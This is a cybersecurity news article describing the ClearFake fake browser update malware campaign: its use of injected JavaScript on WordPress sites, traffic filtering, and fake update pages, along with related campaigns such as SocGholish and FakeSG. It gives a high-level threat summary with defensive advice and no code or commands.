ClearFake Enters the Fake Browser Update Arena to Deliver Malware | Cyware Hacker News

Researchers have shared details of a new fake browser update threat that used a new malware called ClearFake to deliver malicious payloads onto victims’ devices. The malware is similar to SocGholish and FakeSG campaigns that use social engineering tactics to trick users into installing a bogus web browser update.

Modus operandi

The operators behind ClearFake leverage the watering hole technique to inject malicious JavaScript code into compromised WordPress sites. 
  • As part of the tactic, the web traffic is first redirected to the Keitaro TDS filtering service before being lured into fake browser update pages.  
  • The fake update pages look realistic and copy the download pages for Chrome, Edge, and Microsoft.
  • Once the victim clicks on the update button, it downloads the payloads hosted on Dropbox and OneDrive.

It is to be noted that SocGholish operators had successfully leveraged this technique in 2022, which indicates that the same threat group is likely behind the new ClearFake malware.

Change in code injection method

In late September, ClearFake changed its code injection tactics. Previously, the injected code was base64 encoded script added to the HTML of the compromised webpages and most recently it has been observed relying on smart contracts from Binance Smart Chain.

A glance at fake browser updates landscape

Proofpoint has traced at least four distinct threat clusters using fake browser updates to distribute malware. One of these threats is linked to the ClearFake campaign. 
  • Another attack campaign is associated with the SocGholish malware that has been used for over five years to deliver AsyncRAT and NetSupport, among others. 
  • Furthermore, a FakeSG campaign was used to NetSupport RAT onto the victims’ systems. 
  • One more cluster of fake update campaigns was observed in June, with the emergence of SmartApeSG that downloaded NetSupport RAT on compromised systems.

The bottom line

As fake browser updates remain a viable method for malware delivery, organizations need to actively monitor their endpoints and networks to block such threats. Furthermore, the IOCs associated with the threat have been made available to understand attackers’ infrastructure, attack pattern, and their activities.